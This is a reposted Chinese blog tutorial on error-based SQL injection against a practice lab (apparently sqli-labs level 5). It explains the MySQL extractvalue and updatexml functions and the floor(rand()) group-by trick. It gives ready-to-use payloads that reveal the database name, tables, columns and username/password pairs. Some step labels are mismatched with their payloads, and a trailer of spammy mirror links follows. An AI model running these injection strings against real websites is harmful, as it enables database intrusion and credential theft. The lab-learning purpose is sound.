当前位置: 首页 > wzjs >正文

如何让网站快速收录配置安装环境 wordpress 阿里云

wzjs 2025/9/14 4:50:05
如何让网站快速收录,配置安装环境 wordpress 阿里云,免费网站在哪里申请表,cn免费域名注册网站上次写了第五关的布尔盲注,和双查询报错注入,还有其他报错注入的方法 一.extractvalue函数 extractvalue函数 原理 extractvalue 是一个在 XML 数据中提取值的 MySQL 内置函数。它的语法为: EXTRACTVALUE(xml, xpath_expr)xml 是 XML 字符…

上次写了第五关的布尔盲注,和双查询报错注入,还有其他报错注入的方法

一.extractvalue函数

extractvalue函数

原理

extractvalue 是一个在 XML 数据中提取值的 MySQL 内置函数。它的语法为:
EXTRACTVALUE(xml, xpath_expr)xml 是 XML 字符串,xpath_expr 是 XPath 表达式,该函数会从 xml 参数中提取与 XPath 表达式匹配的节点值,并返回结果。如果找不到匹配的节点,则返回空字符串,如果 XPath 表达式匹配了多个节点,则只返回第一个匹配的节点的值。

eg假设有这个XML 数据:

<book><title>MySQL Database Design and Tuning</title><author>Robert D Schneider</author><year>2005</year>
</book>

用 extractvalue 函数提取 title 节点的值:

SELECT EXTRACTVALUE('<book><title>MySQL Database Design and Tuning</title><author>Robert D Schneider</author><year>2005</year></book>', '//title');

执行结果:

MySQL Database Design and Tuning

实例

查库名

1' and extractvalue(1,concat(1,database())) %23

 '1' 表示在输入参数中添加一个条件,该条件与其他条件相互独立,用于生成一个新的查询结果。AND 连接符用于将新的条件与原有查询语句进行逻辑上的连接。extractvalue(1,concat(1,database())) 表示从 XML 数据中提取值,其中第一个参数为 1,表示要查询的 XML 数据,在这里没有实际作用;第二个参数为 concat(1,database()),表示将数字 1 和当前数据库名称拼接成一个字符串,然后使用 extractvalue 函数从该字符串中提取值,并将其添加到查询结果中。如果数据库名称不为空,则返回该名称,否则返回空字符串。回显库名security下图

 

查表名

1' union select 1,2, (updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security')),1)) %23

查列名

1' and extractvalue(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name = 'users' and table_schema = 'security'))) %23

查字段

1' and extractvalue(1,concat(1,(select concat((select group_concat(username) from users), '~', (select group_concat(password) from users)) ) )) %23

由于extractvalue函数只能查询32位长度,导致结果缺失,改用limit查询

1' and extractvalue(1,concat(1,(select concat((select username from users limit 0,1), '~', (select password from users limit 0,1)) ) )) %23

 改一下0,1改成1,1 / 2,1/

 

 

 嘻嘻好像没啥用

updatexml函数

原理

updatexml 函数是 MySQL 数据库中用于修改 XML 格式数据的一个内置函数,语法如下

xml_target 表示要进行修改的 XML 数据;xpath_expr 表示要修改的节点路径;new_val 表示要修改成的新值。updatexml 函数的工作原理是将指定的 XML 数据解析为 DOM(文档对象模型) 文档树,并根据 xpath 表达式找到对应的节点,然后将该节点的内容替换为新值。如果节点不存在,则不进行任何操作。

实例

查库名

1' union select 1,2, (updatexml(1,concat(1,database()),1)) %23

UNION SELECT 1,2,(updatexml(1,concat(1,database()),1)) 表示使用 UNION 运算符将两个查询结果合并起来,同时将 updatexml 函数的结果添加到第二个 SELECT 查询中。

updatexml 函数用于修改 XML 数据中的内容,其中第一个参数为 1,表示要修改的 XML 数据,在这里没有实际作用;第二个参数为 concat(1,database()),表示将数字 1 和当前数据库名称拼接成一个字符串作为修改内容;第三个参数为 1,表示将修改后的结果写入 XML 数据中。

 

查表名

1' union select 1, count(*), concat((select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'), floor(rand(0)*2)) a from information_schema.tables group by a  %23

查列名

1' union select 1, count(*), concat((select concat(username,':',password) from users  limit 0,1), floor(rand(0)*2)) a from information_schema.tables group by a  %23

查字段

1' union select 1,2, (updatexml(1,concat(1,(select username from users limit 0, 1),1,(select password from users limit 0,1)),1)) %23


文章转载自:

http://IlhFOQvL.gstmn.cn
http://3Ny2NUuU.gstmn.cn
http://jfbb7ty5.gstmn.cn
http://mIx9X6ex.gstmn.cn
http://D555SsqJ.gstmn.cn
http://L7WAQpBn.gstmn.cn
http://BJqhI2X3.gstmn.cn
http://VBCpZBHY.gstmn.cn
http://lRInUU2S.gstmn.cn
http://ntYrhmeA.gstmn.cn
http://Mv2dMXgA.gstmn.cn
http://YNBZhuR9.gstmn.cn
http://sEbUoaeP.gstmn.cn
http://9QburV7b.gstmn.cn
http://ZNOYD8s8.gstmn.cn
http://jDCbkjKW.gstmn.cn
http://EbYSTKeA.gstmn.cn
http://acetc1g0.gstmn.cn
http://SfFuFK4Z.gstmn.cn
http://u0VQ6uPN.gstmn.cn
http://Ntmnsf5P.gstmn.cn
http://o8TRm8Wi.gstmn.cn
http://JU4xnkkP.gstmn.cn
http://Pcx4Hk7O.gstmn.cn
http://hDRmefJD.gstmn.cn
http://lSRcom9i.gstmn.cn
http://unTfinCt.gstmn.cn
http://D6OYG2a4.gstmn.cn
http://f0wmLd28.gstmn.cn
http://qhgPeKa1.gstmn.cn
http://www.dtcms.com/wzjs/725814.html

相关文章:

  • 海北州公司网站建设网站建设企业排名
  • 在线做的网站杰恩设计网站是谁做的
  • 国外做旅游攻略的网站好青海西宁网站建设
  • 植物网站模板网站经营网络备案信息管理系统
  • 苏州画廊网站建设wordpress编辑代码
  • 东莞企网站建设网页制作软件免费版dw
  • 恢复被百度k网站 关键词收录上海专业做网站价格
  • 做网站贵不做视频网站 视频放在哪
  • 视频网站开发代码公司的网站 优帮云
  • 黑河北京网站建设网站集群建设通知
  • 做酒店网站设计新的网站平台如何做地推
  • 网站架构包含哪几个部分品牌建设概念
  • 网站推广的六种方式网页设计页面尺寸
  • 国产做性直播视频网站crm软件系统 运用
  • 加快门户网站建设个人网站心得
  • 搜索建站网网站如何做关
  • 网站开发指什么c语言开发网站
  • 做化妆招生宣传在那些网站可以做模板网站会影响网站优化吗
  • 网站制作问题 图片版权网络页面设计公司
  • 优秀的个人网站设计模板建筑工程有哪些项目
  • 谷歌外贸网站建站江西赣州网络公司
  • 通信建设资质管理信息系统网站如何申请网站com域名
  • 做矿产公司的网站产品展示网站系统
  • 网站所用的图片大小做网站需要公司备案
  • 江苏备案网站名称开发公司员工内部销售激励方案
  • 我的wordpress网站吗各大房产网站
  • 网站备案 拍照网点腾讯云wordpress优化
  • 装修公司网站模版网站建设教论坛
  • 网站制作教学厦门中科做网站总打电话来
  • 北京手机网站建设外包保定网络推广公司